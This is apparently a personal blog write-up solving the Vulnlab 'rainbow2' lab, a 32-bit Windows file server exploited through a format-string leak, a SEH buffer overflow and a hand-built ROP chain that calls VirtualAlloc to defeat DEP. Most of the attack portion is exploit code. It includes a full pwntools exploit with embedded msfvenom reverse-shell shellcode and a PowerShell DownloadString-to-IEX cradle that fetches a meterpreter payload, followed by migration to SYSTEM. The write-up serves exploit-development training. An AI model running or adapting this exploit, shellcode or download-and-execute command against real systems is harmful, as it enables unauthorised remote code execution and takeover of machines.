

Hola Mundo!

After passing OSEP and getting my OSC3 (yay!) I wanted to do something other than study and since I finally have time, I decided to try something I got in my TODO list for quite long: Vulnlab a penetretation testing & red teaming labs run by xct, one of my favorites pwners to follow. (I highly recommend his content, specially the red-team labs playlists on youtube)

A cool thing about Vulnlab is that once subscribed, you can manage all the labs from discord, which is really awesome. Also, you can search trough the machines and chains (more than one machine in an AD enviroment) to check what is the intended exploitation path, so that way, you can search for what you want to practice. Since it was months without doing some pwning I started with the rainbow machine an easy to medium binary exploitation machine that I really enjoyed, so after completing it, I decided to try rainbow2.

The machine is rated Hard with good reason so this write-up will be more like a guide or a “manual” on how to exploit the machine, since I will assume some knowledge in binary exploitation, otherwhise it will be too long to read (and write). If you are not familiar with regular buffer overflows, I will recommmend you to try the rainbow machine first, read and try some ROP exercises here, and then comeback to this one. As always this is just a recommendation, since learning is different for everyone ^^. I will also take the chance to recommend this machine to everyone that is studying for the OSED certification, it will help you prepare for it.

some of the tools or frameworks I will be using during this post are th following: (they are not mandatory, you can use any alternatives you prefer)

After all the talk above, and once we got the machine running (again, from discord, really cool stuff), we can grab the IP address and run an nmap, as shown below.

# Nmap 7.94 scan initiated Sat Jun 24 01:17:24 2023 as: nmap -Pn -sV -sC -oN portscan.txt
Nmap scan report for
Host is up (0.24s latency).
Not shown: 997 filtered tcp ports (no-response)
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-05-22  11:57AM               705536 filesrv.exe
| 06-05-22  02:43PM                  275 README.txt
|_06-09-22  05:36AM       <DIR>          SysWOW64
| ftp-syst: 
|_  SYST: Windows_NT
2121/tcp open  msdtc         Microsoft Distributed Transaction Coordinator (error)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-06-24T05:18:32+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RAINBOW2
|   NetBIOS_Domain_Name: RAINBOW2
|   NetBIOS_Computer_Name: RAINBOW2
|   DNS_Domain_Name: Rainbow2
|   DNS_Computer_Name: Rainbow2
|   Product_Version: 10.0.20348
|_  System_Time: 2023-06-24T05:18:28+00:00
| ssl-cert: Subject: commonName=Rainbow2
| Not valid before: 2023-06-23T05:15:02
|_Not valid after:  2023-12-23T05:15:02
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We can tell from the above, This is a Windows machine, and there’s an FTP service that allows anonymous login. We can log-in, inspect, and download the files in it. there’s a README.txt that contains the following:

# FileSrv v0.2

Our simple file sharing server! Currently under development - we still seem to have some minor problems with binary files.

 - After our last custom server got hacked we made sure to enable all mitigations: ASLR, DEP, GS! Now it's 100% secure.

So, now, we know we are dealing with a file server that probably has all protections enabled. We can confirm this is the service running at port 2121 by doing a test, like connect to it using netcat or something similar. We’ll then spin up a Windows VM and start the exploiting, pwn, pwn, pwn.

After checking that it is the same service running, we’ll need to start creating an exploit plan.

We suspect that it will have all protections enabled, so we’ll need to leak memory from the binary. Also when debugging or inspecting with something like the file command we’ll be able to confirm the binary is 32-bit.

➜ file filesrv.exe
filesrv.exe: PE32 executable (console) Intel 80386, for MS Windows, 5 sections

Ok, so what to do now? I usually try to start with a Static Analysis, but this is written in C++, and finding a function within a socket can be trickier (because of c++ objects, if you want to do it, and don’t know how to, you can try starting from here). One quick thing we can do, if we are able to interact with the binary, is to take note of which output is being sent to stdout, like the string “ERROR” that is sent when you enter a wrong command, as we can observe.

➜ nc 2121

We can search for the ERROR string above in IDA, but since we are dealing with ASLR, first we need to rebase the address of the executable to 0x0 so it shows the Offset and not the preferred address, I do this as a good practice, but this is not a necessary step. (File > Segments > Rebase Program)

Next, open the strings window in IDA (Shift + f12) and search for the ERROR string. We’ll find it in the .rdata section at offset 0x000904C4 as shown below.

If we double-click on it. We’ll see it on the .rdata section, and also, we’ll be able to perform a cross-reference to see where it’s being called, in this case, just one function.

From experience and looking at the above funcion in the graph view, we’ll observe there’s a flow control at the bottom of the function.

This usually indicates there are different “paths” the flow can take. Exploring the disassembly can help us to identify and try different commands since We needed to leak an address, as my regular routine with pwn challenges, if I cannot quickly perform Reverse engineering (like in this case, since the binary is in C++, this will probably taker some time), I will just try to look for something like a format string bug, so after enumerating different commands I realize the LST is vulnerable to format string, we can corroborate this by sending the command LST %p-%p-%p, and we’ll observe hexadecimal values returned.

➜ nc 2121
LST %p-%p-%p
ERROR: Can not open Path: 73AA1B6E-3FEA4120-3FEA4120

The values above correspond to Addresses, and corroborating on the debugger, the second one is an address of the binary. We can use it to calculate the base address of the binary and defeat ASLR. At this point, we can use the following code to start interacting with the binary.

from pwn import *

target = ''
r = remote(target, 2121)

payload = b"LST %p-%p-%p-%p-%p"

r.recvuntil(b"ERROR: Can not open Path: ")
leaks = r.recvline().strip().split(b"-")
log.info(f"leaking {leaks}")
for i in range(len(leaks)):
    leaks[i] = int(leaks[i].decode(), 16)
log.info(f"binary leak = {hex(leaks[2])}")

filesrv = leaks[2] - 0x14120

log.info(f"base address = {hex(filesrv)}")

Ok, so now we need to find a vulnerability, probably a Buffer Overflow. After trying again enumerating the commands, we’ll found out that the “LST” command is also vulnerable to a buffer overflow. We can test it by sending the following payload after the memory leaks.

payload = b"A"* 0xfb0

Let’s observe the crash using the exchain command in widbg or a similar one in the debugger of your choosing.

At this point we can overflow the SEH when we send a payload of size 0xfb0. The number 0xfb0 is something to keep in consideration since this size helps me to keep the exploit stable. We’ll see later that when exploiting remote, the return address Offset to overwrite may vary, so I recommend this size, but you can overflow with more if you need to.

Next, we need to calculate the Offset of when the SEH value is being overwritten so we can exploit it. I used msf-pattern, from Kali and determined the proper Offset to overwrite the SEH at 0x408 bytes. We can confirm that sending the following payload.

payload = b"LST "
payload += b"A"*0x408
payload += b"BBBB"
payload += b"C"*(0xfb0-len(payload))

After that, we can confirm the crash again using the !exchain command in windbg.

When the above is verified, we can check for bad characters. This way, we can avoid the use of them when sending our ROP-chain, the characters found were: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20.

So, what now? We need to defeat the next protection in our way DEP. We can use the good old ROP for that. We can probably create a rop chain using something like ropper or mona, but in many cases, I just create the chain myself. I just like to do things hard for me uwu

Ok, we should collect gadgets at this point to start ropping, I used ropper, which runs on Kali, what I was using at the moment, and since we need an offset to the base address, it is important to pass the parameter -I 0x0 to ropper, this way the addresses will not contain the preferred base address as the base address, and we will have just the offsets.

After collecting gadgets, let’s start creating our rop-chain.

Ok, but wait… This is a SEH overflow, so we cannot just go into “Mordor” and start ropping.

If we do the regular exploit plan for SEH, which is to find a “POP POP RET” gadget, we will jump and execute the NSEH, but this is pointless since we steal have not defeated DEP and we will still need to execute something, this is a “stack pivot” gadget will help us. We just need to find a gadget that allows us to move the stack pointer to another area we control in our payload.

After some exploration, at Offset 0x00011396, we’ll find an “add esp, 0xe10” I ended up using. We can create a payload to accomplish what’s being discussed, like the one below.

buf = b""
buf += b"XXXX"
buf += b"A"*0x68 #offset to pivot landing
buf += rop #from here, there's around 350 bytes to ROP

payload  = b""
payload += b"LST "
payload += buf
payload += b"A" * (0x408-len(buf))
payload += b"BBBB" #We have DEP, so no need to jump to NSEH
payload += p32(filesrv+0x00011396) # Stack pivot add esp, 0xe10
payload += b"\x90" * 64
#payload += shellcode
payload += b"\x90" * (0xfb0-len(payload))


Great, so now it’s time to start ropping? Well… let’s wait a little bit…

We need to figure out what rop chain we should create first and to do that, we can inspect the IAT in search for some imported Win32 API that allows us to manipulate memory in a way we can disable DEP, since this protection is enabled, we cannot execute Shellcode on the stack so we need a way to bypass this. The common APIs used WriteProcessMemory, VirtualAlloc, and VirtualProtect are not listed on the IAT. We can verify that by looking at imports sections in IDA. (you can also use windbg for this, it really doesn’t matter)

Now If we remember, we also download from the FTP server a kernel32.dll file, probably the one being used by the binary. It that’s the case, it means that even if the API is not imported by the binary, we can calculate the Offset from another imported address f to any other API address we want form kernel32. So let’s go ahead and do that.

For this binary, I choose to use VirtualAlloc, but any of the other mentioned APIs used in ROP techniques should work. We need to choose an address to calculate the Offset from it, and that it is imported, so I choose TLSfree located at offset 0x90148 of the base address in the idata or IAT (import address table)

We can create a variable for later use with this address.

tlsfree_iat = filesrv+0x00090148

Now we need to calculate the Offset of that address to VirtualAlloc within kernel32.dll, so we can load the downloaded kernel32.dll in IDA and check the exports, but first, we should rebase the program with the base address 0x0 to show us just the Offset to the base address. After that, we can observe the Offset to TLSFree: 0x192e0.

Continuing, we can observe the Offset from the base address to VirtualAlloc in this case: 0x16250.

With some super-duper-math we can calculate the Offset within the addresses of the functions.

>>> hex(0x192e0 - 0x16250)
>>> '0x3090'

Great! We have the information that we need to get the VirtualAlloc address. Let’s start ropping

Not yet… We need to look at how VirtualAlloc is defined in MSDN so that way we know which parameter we should pass to the function.

Since, we are dealing with x86, where we need to pass the parameter in the stack after the function address and the return address for the function after finishing the exection. We’ll create a stub in the stack that looks like the following.

- VirtualAlloc Address => The  Address of VirtualAlloc in kernel32.dll 
- Return address => Where we return after VirtualAlloc is executed. This should be where our Shellcode will be  on the stack
- lpAddress => This is the area of memory (downgraded to memory page address, 0x100), so this could be the Shellcode address on the stack also.
- dwSize => 0x1 (in pages)
- flAllocationType =>  0x1000 (the type of allocation)
- flProtect => 0x40, Which corresponds to RWX permissions for the region we are "allocating."

The above parameters should be set on the stack in the same order so this table can help us during exploitation.

Finally! We have a plan, let’s start ropping!

Remember I mentioned the crash was not stable? (at least for me), depending on the number of bytes or characters I was sending, the address to overwrite changed. That’s why at the beginning of the exploit, I placed a ROP-NOP or ret-slide that is just a series of addresses containing a ret instruction. Since we are performing the rop in the stack, the ret instruction acts as a NOP, and it will just return to the next instruction. This way, we can solve the issue of the binary crashing at different offsets.

rop = b""
rop += p32(filesrv+0x0007c5f6) * 4 #ret slide

One of the first things that are good to do when starting a rop-chain is to save the current stack value, we’ll need to do this since we are going to build the chain in the stack, and then it is also needed to direct execution to our Shellcode, so let’s begin with that.

The gadget I found to perform this is the following.

push esp; add dword ptr [eax], eax; pop ecx; ret;

If we noticed, this gadget pushes the ESP value and then “pop it” into ECX, but before it adds to the address EAX is pointing to the value of it. So if EAX is not pointing to a writeable area, this will fail. To solve this, we can make the value in EAX point into a writeable area like the .rdata. With that, we can add the following to our chain.

rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(filesrv+0xA6030) # address in .data
rop += p32(filesrv+0x000683da) #push esp; add dword ptr [eax], eax; pop ecx; ret;

With the above, the stack pointer is now stored in ECX. We should probably build our stack in another area to not overwrite the gadgets being sent, so the stub can be constructed above our current payload, I choose 0x50 above, but this value is arbitrary. Let’s accomplish this by using the following gadgets.

rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xffffffb0) # - 0x50
rop += p32(filesrv+0x0001bb91) # add ecx, edx; clc; pop ebp; ret;)
rop += p32(0x41424344) #junk for ebp

We’ll use an addition, but we’ll “pop” a negative value. This is done to avoid NULL bytes. ECX now has the value of the stack-0x50, and we’ll use it to point to our stub

Next, We need to move the value of TLSFree to a register. Since we have the IAT address stored in tlsfree_iat, we can dereference it and then subtract the Offset from VirtualAlloc

rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(tlsfree_iat)
rop += p32(filesrv+0x0002bb94) # mov eax, dword ptr [eax]; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xffffcf70) # 0x3090 
rop += p32(filesrv+0x0003697f) # add eax, edx; ret;

We subtracted the value 0x3090, and now EAX has the value of VirtualAlloc in Kernel32. We can then store it in our stub using the following gadget.

rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

Great, now we should increase the “stub-pointer” in ECX with the following:

rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

So far, so good. Our next task is to set up the return address where our payload should return after the execution of VirtualAlloc, ideally, where our Shellcode resides. One of the reasons to choose to put our stub above the current payload we are sending is so we can calculate where to land, for that after looking at the stack in the debugger at Offset 0x3f0 from our “stub-pointer” looks good, we can use that value, add 0x3f0 and then place it in our stub, ropping like this:

rop += p32(filesrv+0x0003e7d2) # mov eax, ecx; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xfffffc10) #0x3f0
rop += p32(filesrv+0x00059a05) # sub eax, edx; pop ebp; ret;)
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

Great, we add the value first, passing the value of ECX to EAX and then doing a negative subtraction, again to avoid NULL bytes. We should increase the stub-pointer after.

rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

Now it’s time to set up the lpAddress parameter of VirtualAlloc, and since this should be the same value we calculated before, we can just do the same this time. We will subtract 0x3f0-4 to compensate for this (since we increased the stub-pointer by 4).

rop += p32(filesrv+0x0003e7d2) # mov eax, ecx; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xfffffc14) #0x3f0-4
rop += p32(filesrv+0x00059a05) # sub eax, edx; pop ebp; ret;)
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

Awesome, now we are ready to increase the stub-pointer again and move to the next argument.

rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

We need to set dwsize to 1, since we want to avoid NULL bytes, we can pop -1 to a register and then use a gadget to negate it, and then move it to the stub, as shown below.

rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(0xffffffff) #-1
rop += p32(filesrv+0x00031630) # neg eax; pop ebp; ret;
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

Time to increase the stub-pointer…

rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

Continuing, let’s set up now the flAllocationType argument to 0x1000. Nothing fancy here. Just the same we are doing negating the value and then increasing it. (to avoid NULL and/or badchars)

rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(0xffffefff) #-0x1001
rop += p32(filesrv+0x00031630) # neg eax; pop ebp; ret;
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x000774c6) # dec eax; ret
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

Let’s move forward in our stub-pointer! We are close…

rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

The argument left to set in the stub is flProtect, which needs to be 0x40 in order to set the permissions of the memory we are allocating as RWX, and this way bypasses the DEP protection. Let’s use one more time the negate trick to accomplish this.

rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(0xffffffc0) #-0x40
rop += p32(filesrv+0x00031630) # neg eax; pop ebp; ret;
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

Now, the only thing left to add to our chain is a jump to our Shellcode. The way I did this was by calculating the difference between the current stub-pointer in the stack and the Shellcode. Which was 0x14, so we can move the stub-pointer to EAX and then add 0x14 by doing a negative subtraction with EDX . Finally, we can use the “xchg esp, eax; ret;” gadget to set the value of the stack to it, so after the return, we should land in our payload.

rop += p32(filesrv+0x0003e7d2) # mov eax, ecx; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xffffffec) # - 0x14
rop += p32(filesrv+0x0003697f) # add eax, edx; ret;
rop += p32(filesrv+0x00066ab3) # xchg esp, eax; ret;

We can test the above by creating a variable, Shellcode with the int3 char, that should stop execution, acting as a break-point, if DEP is disabled.

shellcode = b"\xcc"*300

And then, adding it to our payload to be sent, as shown below.

payload  = b""
payload += b"LST "
payload += buf
payload += b"A" * (0x408-len(buf))
payload += b"BBBB" #
payload += p32(filesrv+0x00011396) # Stack pivot add esp, 0xe10
payload += b"\x90" * 64
payload += shellcode
payload += b"\x90" * (0xfb0-len(payload))


We can corroborate our rop-chain is working using the debugger. We should stop before the CC (breakpoint) instruction is executed.

Yay! Now we can execute on the stack (we can confirm by executing on the debugger). We also can control the execution to point to our desired Shellcode, so we can send a reverse shell. At the time, I used the following msfvenom command to generate it.

msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=1337 -b"\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode

Let’s replace our shellcode variable with the one generated with msfvenom. You can verify that it is working in your local VM before sending the payload if you need to. The only thing and this is maybe due to latency, but I had to put a sleep() call before sending the payload to avoid some weird crashes, as shown below.

payload  = b""
payload += b"LST "
payload += buf
payload += b"A" * (0x408-len(buf))
payload += b"BBBB" #
payload += p32(filesrv+0x00011396) # Stack pivot add esp, 0xe10
payload += b"\x90" * 64
payload += shellcode
payload += b"\x90" * (0xfb0-len(payload))

Now let’s fire-up the exploit and….

We got a shell (YAY!) as the user dev.



After going for the user flag (LOL) we can escalate privileges to get an SYSTEM shell. For that, we check our privileges and groups using the whoami /all comman. We’ll receive an output similar to the one below.

C:\shared>whoami /all
whoami /all


User Name    SID
============ ============================================
rainbow2\dev S-1-5-21-808228402-3739535260-876242396-1000


Group Name                           Type             SID          Attributes                      
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                 


Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

ERROR: Unable to get user claims information.


We can observe we have a high-integrity shell, and we are part of NT AUTHORITY. So after all that ropping, I went the easy way and first called a PowerShell reverse_shell and generate a 32-bit meterpreter shell (remember, we are running on an x86 process).

Next, let’s host the reverse shell in a Python web server. and execute PowerShell to download and execute the meterpreter reverse shell with the following command.

(new-object system.net.webclient).DownloadString('') | IEX

We got a meterpreter session.

Elevating privileges is now trivial. Migrating to a SYSTEM process, like the spoolsv process, and use the migrate command in Metasploit we’ll be enough to accomplish this.

We are now SYSTEM!! And after some root-dance we can read the root.txt.


I really enjoyed the machine, and since I love exploit-dev this was absolute heaven for me. I recommend this machine to anyone interested in learning Windows exploit development or anyone who wants to have some good quality pwning-time. Thanks to xct for the challenge. I’m waiting for rainbow3!

Full Exploit code

This is the full exploit to get the user.

from pwn import *

target = ''

r = remote(target, 2121)

#offset = 0x408
#size = 0xfb0

payload = b"LST %p-%p-%p-%p-%p"

r.recvuntil(b"ERROR: Can not open Path: ")
leaks = r.recvline().strip().split(b"-")
log.info(f"leaking {leaks}")
for i in range(len(leaks)):
    leaks[i] = int(leaks[i].decode(), 16)
log.info(f"binary leak = {hex(leaks[2])}")

filesrv = leaks[2] - 0x14120

log.info(f"base address = {hex(filesrv)}")

### shellcode
#msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=1337 -b "\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode
shellcode =  b""
shellcode += b"\xbf\xa8\xf9\xb1\xa8\xd9\xe1\xd9\x74\x24\xf4"
shellcode += b"\x5a\x2b\xc9\xb1\x52\x31\x7a\x12\x83\xea\xfc"
shellcode += b"\x03\xd2\xf7\x53\x5d\xde\xe0\x16\x9e\x1e\xf1"
shellcode += b"\x76\x16\xfb\xc0\xb6\x4c\x88\x73\x07\x06\xdc"
shellcode += b"\x7f\xec\x4a\xf4\xf4\x80\x42\xfb\xbd\x2f\xb5"
shellcode += b"\x32\x3d\x03\x85\x55\xbd\x5e\xda\xb5\xfc\x90"
shellcode += b"\x2f\xb4\x39\xcc\xc2\xe4\x92\x9a\x71\x18\x96"
shellcode += b"\xd7\x49\x93\xe4\xf6\xc9\x40\xbc\xf9\xf8\xd7"
shellcode += b"\xb6\xa3\xda\xd6\x1b\xd8\x52\xc0\x78\xe5\x2d"
shellcode += b"\x7b\x4a\x91\xaf\xad\x82\x5a\x03\x90\x2a\xa9"
shellcode += b"\x5d\xd5\x8d\x52\x28\x2f\xee\xef\x2b\xf4\x8c"
shellcode += b"\x2b\xb9\xee\x37\xbf\x19\xca\xc6\x6c\xff\x99"
shellcode += b"\xc5\xd9\x8b\xc5\xc9\xdc\x58\x7e\xf5\x55\x5f"
shellcode += b"\x50\x7f\x2d\x44\x74\xdb\xf5\xe5\x2d\x81\x58"
shellcode += b"\x19\x2d\x6a\x04\xbf\x26\x87\x51\xb2\x65\xc0"
shellcode += b"\x96\xff\x95\x10\xb1\x88\xe6\x22\x1e\x23\x60"
shellcode += b"\x0f\xd7\xed\x77\x70\xc2\x4a\xe7\x8f\xed\xaa"
shellcode += b"\x2e\x54\xb9\xfa\x58\x7d\xc2\x90\x98\x82\x17"
shellcode += b"\x36\xc8\x2c\xc8\xf7\xb8\x8c\xb8\x9f\xd2\x02"
shellcode += b"\xe6\x80\xdd\xc8\x8f\x2b\x24\x9b\xa5\xa3\x26"
shellcode += b"\xd1\xd2\xb1\x26\xe0\x1b\x3f\xc0\x80\x4b\x69"
shellcode += b"\x5b\x3d\xf5\x30\x17\xdc\xfa\xee\x52\xde\x71"
shellcode += b"\x1d\xa3\x91\x71\x68\xb7\x46\x72\x27\xe5\xc1"
shellcode += b"\x8d\x9d\x81\x8e\x1c\x7a\x51\xd8\x3c\xd5\x06"
shellcode += b"\x8d\xf3\x2c\xc2\x23\xad\x86\xf0\xb9\x2b\xe0"
shellcode += b"\xb0\x65\x88\xef\x39\xeb\xb4\xcb\x29\x35\x34"
shellcode += b"\x50\x1d\xe9\x63\x0e\xcb\x4f\xda\xe0\xa5\x19"
shellcode += b"\xb1\xaa\x21\xdf\xf9\x6c\x37\xe0\xd7\x1a\xd7"
shellcode += b"\x51\x8e\x5a\xe8\x5e\x46\x6b\x91\x82\xf6\x94"
shellcode += b"\x48\x07\x06\xdf\xd0\x2e\x8f\x86\x81\x72\xd2"
shellcode += b"\x38\x7c\xb0\xeb\xba\x74\x49\x08\xa2\xfd\x4c"
shellcode += b"\x54\x64\xee\x3c\xc5\x01\x10\x92\xe6\x03"

#0x09 0x0a 0x0d 0x0b 0x0c 0x020

log.info(f"Pivot Gadget : add esp, 0xd60 = {hex(filesrv+0x0001139d)}")

#### Ropping ######
### VirtualAlloc? ###
#modifying because of bad byte at 09
tlsfree_iat = filesrv+0x00090148

rop = b""
rop += p32(filesrv+0x0007c5f6) * 4 #ret slide
rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(filesrv+0xA6030) # address in .data
rop += p32(filesrv+0x000683da) #push esp; add dword ptr [eax], eax; pop ecx; ret;
#stack ptr in ECX
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xffffffb0) # - 0x50
rop += p32(filesrv+0x0001bb91) # add ecx, edx; clc; pop ebp; ret;)
rop += p32(0x41424344) #junk for ebp
#Moving the virtual alloc  address to stack
rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(tlsfree_iat)
rop += p32(filesrv+0x0002bb94) # mov eax, dword ptr [eax]; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xffffcf70) # 0x3090 # - 4BB0
rop += p32(filesrv+0x0003697f) # add eax, edx; ret;

#eax should point to VirtualAlloc now
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;
#moving virtual alloc to the stack above

#increasing the stack pointer in ecx
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

# Setting the ret address for VirtualAlloc
rop += p32(filesrv+0x0003e7d2) # mov eax, ecx; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xfffffc10) #0x3f0
rop += p32(filesrv+0x00059a05) # sub eax, edx; pop ebp; ret;)
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

#increasing the stack pointer in ecx
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

#memory to virtualprotect (same as ret)
rop += p32(filesrv+0x0003e7d2) # mov eax, ecx; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xfffffc14) #0x3f0-4
rop += p32(filesrv+0x00059a05) # sub eax, edx; pop ebp; ret;)
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

#increasing the stack pointer in ecx
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

#dwsize 0x1
rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(0xffffffff) #-1
rop += p32(filesrv+0x00031630) # neg eax; pop ebp; ret;
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

#increasing the stack pointer in ecx
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

#flAllocationType 0x1000
rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(0xffffefff) #-0x1001
rop += p32(filesrv+0x00031630) # neg eax; pop ebp; ret;
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x000774c6) # dec eax; ret
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

#increasing the stack pointer in ecx
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;

#flProtect 0x40
rop += p32(filesrv+0x0004cbfb) #pop eax; ret;
rop += p32(0xffffffc0) #-0x40
rop += p32(filesrv+0x00031630) # neg eax; pop ebp; ret;
rop += p32(0x41424344) #junk for EBP
rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;

#jumping to virtualprotect stub
rop += p32(filesrv+0x0003e7d2) # mov eax, ecx; ret;
rop += p32(filesrv+0x000636cd) # pop edx; ret;
rop += p32(0xffffffec) # - 0x14
rop += p32(filesrv+0x0003697f) # add eax, edx; ret;
rop += p32(filesrv+0x00066ab3) # xchg esp, eax; ret;

#bp filesrv+0x00011396

buf = b""
buf += b"XXXX"
buf += b"A"*0x68 #offset to pivot landing
buf += rop #from here there's around 350 bytes to ROP

payload  = b""
payload += b"LST "
payload += buf
payload += b"A" * (0x408-len(buf))
payload += b"BBBB" #We have DEP so no nseh
payload += p32(filesrv+0x00011396) # Stack pivot add esp, 0xe10
payload += b"\x90" * 64
payload += shellcode
payload += b"\x90" * (0xfb0-len(payload))
sleep(2) #if you don't wait the payload is not sent properly